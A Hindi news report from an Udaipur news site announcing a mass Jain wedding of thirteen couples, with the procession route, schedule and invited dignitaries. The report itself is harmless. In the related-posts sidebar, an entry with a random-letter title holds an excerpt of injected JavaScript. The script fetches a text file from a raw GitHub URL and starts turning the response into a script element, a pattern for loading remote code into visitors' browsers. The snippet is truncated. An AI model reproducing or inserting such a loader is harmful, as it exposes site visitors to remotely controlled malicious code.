तेरह जोडे बंधेंगे परिणय सूत्र में

Date:

u22janph-1श्री महावीर युवा मंच संस्थान एवं सामूहिक विवाह समारोह समिति करेंगी आयोजन
उदयपुर, । श्री महावीर युवा मंच संस्थान एवं सामूहिक विवाह समारोह समिति के साझे में प्रतिवर्ष की भांति गणतंत्र दिवस पर होने वाले सकल जैन समाज के सामूहिक विवाह तेरह जोडे परिणय सूत्र में बंधेंगे। आयोजन की अन्य तैयारियां अंतिम चरण में हैं।
संस्थान के मुख्य संरक्षक राजकुमार फत्तावत ने आज यहां प्रेस वार्ता में बताया कि इस बार आयोजन स्थल बदलकर भूपालपुरा ग्राउंड रखा गया है। २६ जनवरी को सुबह ९.३० बजे नगर निगम टाउनहॉल प्रांगण से सामूहिक बारात रवाना होगी। बारात टाउनहॉल से आरंभ होकर बापू बाजार, देहलीगेट, शास्त्री सर्किल होते हुए भूपालपुरा ग्राउंड पहुंचेगी जहां सामूहिक तोरण की रस्म होगी। बारात में सबसे आगे हाथी, ऊंटगाडी पर शहनाई वादक, बैंड शामिल होंगे। इनके पीछे बाराती होंगे तथा सुसज्जित घोडों पर दूल्हे सवार होंगे। इनके पीछे बग्घियों में दुल्हनें बैठेंगी। फिर महिलाएं मंगल गीत गाती हुई चलेंगी। ग्राउंड पर वीआईपी पांडाल बनाया गया है। स्टेज पर सामूहिक वरमाला का आयोजन होगा। ११ बजे से दूल्हा-दुल्हनों के परिजनों, रिश्तेदारों सहित आमंत्रित अतिथियों का स्नेह भोज होगा। दोपहर २.२० बजे सामूहिक पाणिग्रहण संस्कार होगा। नवदंपत्तियों को विदाई के दौरान श्रेष्ठजनों से प्राप्त १०१ उपहार प्रदान किए जाएंगे। इसके बाद वर्ष २०१४ का अलंकरण समारोह होगा। सामूहिक विवाह में चित्तौ$डग$ढ, उज्जैन, नीमच, राजसमंद, इंदौर, डूंगला, केकडी, जयपुर, बैंगलोर, भीलवाडा, रतलाम एवं पालघर के जोडे परिणय सूत्र में बंधेंगे।
संस्थान के अध्यक्ष टीनू माण्डावत ने बताया कि कार्यक्रम में प्रेरणा पाथेय के रूप में राज्य के ग्रामीण विकास एवं पंचायतीराज मंत्री गुलाबचंद कटारिया नवदंपत्तियों को आशीर्वाद प्रदान करेंगे वहीं मुख्य अतिथि के रूप में आदर्श क्रेडिट को ऑपरेटिव बैंक लिमिटेड के प्रबंध निदेशक मुकेश मोदी एवं विशिष्ट अतिथि के रूप में अखिल भारतीय तेरापंथ युवक परिषद के अध्यक्ष अविनाश नाहर शिरकत करेंगे। समारोह की अध्यक्षता स्थानकवासी जैन कॉन्फ्रेस नई दिल्ली के राष्ट्रीय अध्यक्ष अविनाश चोरडिया करेंगे। जिला प्रमुख मधु मेहता एवं नगर निगम की महापौर रजनी डांगी समारोह की सम्माननीय अतिथि होंगी। ध्वजारोहण सिंदू के समाजसेवी मांगीलाल लोढा करेंगे।

Shabana Pathan
Shabana Pathanhttp://www.udaipurpost.com
Contributer & Co-Editor at UdaipurPost.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...